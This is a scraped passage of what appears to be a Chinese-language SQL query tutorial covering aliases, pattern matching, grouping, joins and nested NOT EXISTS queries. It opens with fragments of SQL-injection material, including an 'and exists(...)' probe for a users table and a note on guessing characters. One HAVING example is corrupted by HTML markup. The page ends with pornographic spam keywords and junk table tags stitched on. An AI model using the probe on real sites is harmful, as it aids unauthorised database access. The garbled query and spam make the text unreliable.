/>Access:abc(數字) SQLServer:abc (數字)<br />作用:返回數字的絕對值(在猜解漢字的時候會用到)<br /><br />Access:A between B And C SQLServer:A between B And C<br />作用:判斷A是否界于B與C之間<br /><br />and exists(Select top 1 * From 用戶 order by id)<br /><br /><br />1.在查詢結果中顯示列名:<br />a.用as關鍵字:select name as '姓名' from students order by age<br />b.直接表示:select name '姓名' from students order by age<br /><br />2.精確查找:<br />a.用in限定范圍:select * from students where native in ('湖南', '四川') <br />b.between...and:select * from students where age between 20 and 30<br />c.“=”:select * from students where name = '李山' <br />d.like:select * from students where name like '李%' (注意查詢條件中有“%”,則說明是部分匹配,而且還有先后信息在里面,即查找以“李”開頭的匹配項。所以若查詢有“李”的所有對象,應該命令:'%李%';若是第二個字為李,則應為'_李%'或'_李'或'_李_'。)<br />e.[]匹配檢查符:select * from courses where cno like '[AC]%' (表示或的關系,與&quot;in(...)&quot;類似,而且&quot;[]&quot;可以表示范圍,如:select * from courses where cno like '[A-C]%')<br /><br /><br />3.對于時間類型變量的處理<br />a.smalldatetime:直接按照字符串處理的方式進行處理,例如:select * from students where birth &gt; = '1980-1-1' and birth &lt;= '1980-12-31'<br /><br /><br />4.集函數<br />a.count()求和,如:select count(*) from students (求學生總人數)<br />b.avg(列)求平均,如:select avg(mark) from grades where cno=’B2’<br />c.max(列)和min(列),求最大與最小<br /><br />5.分組group<br />常用于統計時,如分組查總數:select gender,count(sno) from students group by gender(查看男女學生各有多少)<br />注意:從哪種角度分組就從哪列&quot;group by&quot;<br />對于多重分組,只需將分組規則羅列。比如查詢各屆各專業的男女同學人數 ,那么分組規則有:屆別(grade)、專業(mno)和<br />性別(gender),所以有&quot;group by grade, mno, gender&quot;<br />select grade, mno, gender, count(*) from students group by grade, mno, gender<br />通常group還和having聯用,比如查詢1門課以上不及格的學生,則按學號(sno)分類有:<br />select sno,count(*) from grades where mark&lt;60 group=&quot;&quot; by=&quot;&quot; sno=&quot;&quot; having=&quot;&quot; count=&quot;&quot;&gt;1<br /><br /><br />6.UNION聯合<br />合并查詢結果,如:<br />SELECT * FROM students WHERE name like ‘張%’UNION [ALL] SELECT * FROM students WHERE name like ‘李%’<br /><br /><br />7.多表查詢<br />a.內連接<br />select g.sno,s.name,c.coursename from grades g JOIN students s ON g.sno=s.sno JOIN courses c ON g.cno=c.cno<br />(注意可以引用別名)<br />b.外連接<br />b1.左連接<br />select courses.cno,max(coursename),count(sno) from courses LEFT JOIN grades ON courses.cno=grades.cno group by courses.cno<br />左連接特點:顯示全部左邊表中的所有項目,即使其中有些項中的數據未填寫完全。<br /><br />左外連接返回那些存在于左表而右表中卻沒有的行,再加上內連接的行。<br />b2.右連接<br />與左連接類似<br />b3.全連接<br />select sno,name,major from students FULL JOIN majors ON students.mno=majors.mno<br />兩邊表中的內容全部顯示<br />c.自身連接<br />select c1.cno,c1.coursename,c1.pno,c2.coursename from courses c1,courses c2 where c1.pno=c2.cno<br />采用別名解決問題。<br />d.交*連接<br />select lastname+firstname from lastname CROSS JOIN firstanme<br />相當于做笛卡兒積<br /><br /><br />8.嵌套查詢<br />a.用關鍵字IN,如查詢豬豬山的同鄉:<br />select * from students where native in (select native from students where name=’豬豬’) <br />b.使用關鍵字EXIST,比如,下面兩句是等價的:<br />select * from students where sno in (select sno from grades where cno=’B2’)<br /><br />select * from students where exists (select * from grades where grades.sno=students.sno AND cno=’B2’)<br /><br /><br />9.關于排序order<br />a.對于排序order,有兩種方法:asc升序和desc降序<br />b.對于排序order,可以按照查詢條件中的某項排列,而且這項可用數字表示,如:<br />select sno,count(*) ,avg(mark) from grades group by sno having avg(mark)&gt;85 order by 3<br /><br />10.其他<br />a.對于有空格的識別名稱,應該用&quot;[]&quot;括住。<br />b.對于某列中沒有數據的特定查詢可以用null判斷,如select sno,courseno from grades where mark IS NULL<br />c.注意區分在嵌套查詢中使用的any與all的區別,any相當于邏輯運算“||”而all則相當于邏輯運算“&amp;&amp;”<br />d.注意在做否定意義的查詢是小心進入陷阱:<br />如,沒有選修‘B2’課程的學生 :<br />select students.* from students, grades where students.sno=grades.sno AND grades.cno &lt;&gt; ’B2’ <br />上面的查詢方式是錯誤的,正確方式見下方:<br />select * from students where not exists (select * from grades where grades.sno=students.sno AND cno='B2')<br /><br />11.關于有難度多重嵌套查詢的解決思想:如,選修了全部課程的學生:<br />select * from students where not exists (select * from courses where NOT EXISTS (select * from grades where sno=students.sno AND cno=courses.cno))<br />最外一重:從學生表中選,排除那些有課沒選的。用not exist。由于討論對象是課程,所以第二重查詢從course表中找,排除那些選了課的即可。 女人让男人桶30分钟免费视频,女人张开腿让男人桶个爽,一进一出又大又粗爽视频
  • <td id="ae6ms"><li id="ae6ms"></li></td>
  • <xmp id="ae6ms"><td id="ae6ms"></td><table id="ae6ms"></table>
  • <table id="ae6ms"></table>
  • <td id="ae6ms"></td>
    <td id="ae6ms"></td>
  • <table id="ae6ms"></table><table id="ae6ms"><td id="ae6ms"></td></table>
  • <td id="ae6ms"></td>
  • <table id="ae6ms"><li id="ae6ms"></li></table>
  • <table id="ae6ms"></table>